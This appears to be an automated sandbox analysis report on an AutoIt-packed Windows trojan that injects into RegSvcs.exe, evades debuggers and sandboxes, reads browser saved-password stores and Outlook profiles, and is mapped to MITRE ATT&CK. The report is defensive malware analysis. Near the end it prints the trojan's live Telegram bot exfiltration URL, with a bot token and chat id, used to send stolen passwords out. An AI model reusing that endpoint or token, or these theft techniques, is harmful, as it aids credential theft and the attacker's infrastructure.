                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594399Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2002Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7848Jump to behavior
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeEvaded block: after key decisiongraph_1-87331
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeEvaded block: after key decisiongraph_1-88411
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-87876
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeAPI coverage: 4.6 %
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00766CA9 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00766CA9
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_007660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,1_2_007660DD
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_007663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,1_2_007663F9
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0076EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0076EB60
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0076F56F FindFirstFileW,FindClose,1_2_0076F56F
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0076F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_0076F5FA
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00771B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00771B2F
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00771C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00771C8A
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00771F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00771F94
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0073DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_0073DDC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598498Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597266Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597155Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596115Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595948Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595841Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595297Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595078Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594969Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594399Jump to behavior
                  Source: VIAmJUhQ54.exe, 00000001.00000002.1289024763.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, VIAmJUhQ54.exe, 00000001.00000003.1263889264.0000000000D9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QeMu6
                  Source: RegSvcs.exe, 00000008.00000002.3713666408.0000000000D8D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeAPI call chain: ExitProcess graph end nodegraph_1-87101
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00776AAF BlockInput,1_2_00776AAF
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00723D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_00723D19
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00753920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,1_2_00753920
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0073E01E LoadLibraryA,GetProcAddress,1_2_0073E01E
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00F07268 mov eax, dword ptr fs:[00000030h]1_2_00F07268
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00F07208 mov eax, dword ptr fs:[00000030h]1_2_00F07208
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00F05BB8 mov eax, dword ptr fs:[00000030h]1_2_00F05BB8
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0075A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_0075A66C
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_007481AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_007481AC
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00748189 SetUnhandledExceptionFilter,1_2_00748189
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 879008Jump to behavior
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0075B106 LogonUserW,1_2_0075B106
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00723D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_00723D19
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0076411C SendInput,keybd_event,1_2_0076411C
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_007674E7 mouse_event,1_2_007674E7
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\VIAmJUhQ54.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0075A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_0075A66C
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_007671FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_007671FA
                  Source: VIAmJUhQ54.exeBinary or memory string: Shell_TrayWnd
                  Source: VIAmJUhQ54.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_007465C4 cpuid 1_2_007465C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0077091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,1_2_0077091D
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0079B340 GetUserNameW,1_2_0079B340
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00751E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_00751E8E
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0073DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_0073DDC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.VIAmJUhQ54.exe.3690000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.VIAmJUhQ54.exe.3690000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3712605161.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1289354649.0000000003690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: VIAmJUhQ54.exe PID: 5924, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7336, type: MEMORYSTR
                  Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.VIAmJUhQ54.exe.3690000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.VIAmJUhQ54.exe.3690000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3712605161.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1289354649.0000000003690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: VIAmJUhQ54.exe PID: 5924, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7336, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: VIAmJUhQ54.exeBinary or memory string: WIN_81
                  Source: VIAmJUhQ54.exeBinary or memory string: WIN_XP
                  Source: VIAmJUhQ54.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                  Source: VIAmJUhQ54.exeBinary or memory string: WIN_XPe
                  Source: VIAmJUhQ54.exeBinary or memory string: WIN_VISTA
                  Source: VIAmJUhQ54.exeBinary or memory string: WIN_7
                  Source: VIAmJUhQ54.exeBinary or memory string: WIN_8
                  Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.VIAmJUhQ54.exe.3690000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.VIAmJUhQ54.exe.3690000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3712605161.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1289354649.0000000003690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: VIAmJUhQ54.exe PID: 5924, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7336, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.VIAmJUhQ54.exe.3690000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.VIAmJUhQ54.exe.3690000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3712605161.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1289354649.0000000003690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: VIAmJUhQ54.exe PID: 5924, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7336, type: MEMORYSTR
                  Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.VIAmJUhQ54.exe.3690000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.VIAmJUhQ54.exe.3690000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3712605161.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1289354649.0000000003690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: VIAmJUhQ54.exe PID: 5924, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7336, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_00778C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_00778C4F
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_0077923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_0077923B
                  Source: C:\Users\user\Desktop\VIAmJUhQ54.exeCode function: 1_2_007558C5 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset,1_2_007558C5
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure2
                  Valid Accounts
                  3
                  Native API
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  11
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault AccountsScheduled Task/Job2
                  Valid Accounts
                  1
                  DLL Side-Loading
                  1
                  Deobfuscate/Decode Files or Information
                  21
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  2
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                  Valid Accounts
                  2
                  Obfuscated Files or Information
                  Security Account Manager1
                  File and Directory Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  11
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation
                  1
                  DLL Side-Loading
                  NTDS127
                  System Information Discovery
                  Distributed Component Object Model21
                  Input Capture
                  3
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection
                  2
                  Valid Accounts
                  LSA Secrets131
                  Security Software Discovery
                  SSH3
                  Clipboard Data
                  14
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials11
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Access Token Manipulation
                  DCSync2
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                  Process Injection
                  Proc Filesystem11
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  VIAmJUhQ54.exe79%ReversingLabsWin32.Trojan.AutoitInject
                  VIAmJUhQ54.exe69%VirustotalBrowse
                  VIAmJUhQ54.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  104.21.80.1
                  truefalse
                    high
                    api.telegram.org
                    149.154.167.220
                    truefalse
                      high
                      checkip.dyndns.com
                      193.122.130.0
                      truefalse
                        high
                        checkip.dyndns.org
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          http://checkip.dyndns.org/false
                            high
                            https://reallyfreegeoip.org/xml/8.46.123.189false
                              high
                              https://api.telegram.org/bot7910311526:AAEn5doit3APLTHTBsAxIx_YHMTZbEuOtRo/sendDocument?chat_id=6712961026&caption=user%20/%20Passwords%20/%208.46.123.189false
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://api.telegram.orgRegSvcs.exe, 00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/botRegSvcs.exe, 00000008.00000002.3714455601.0000000002BBB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
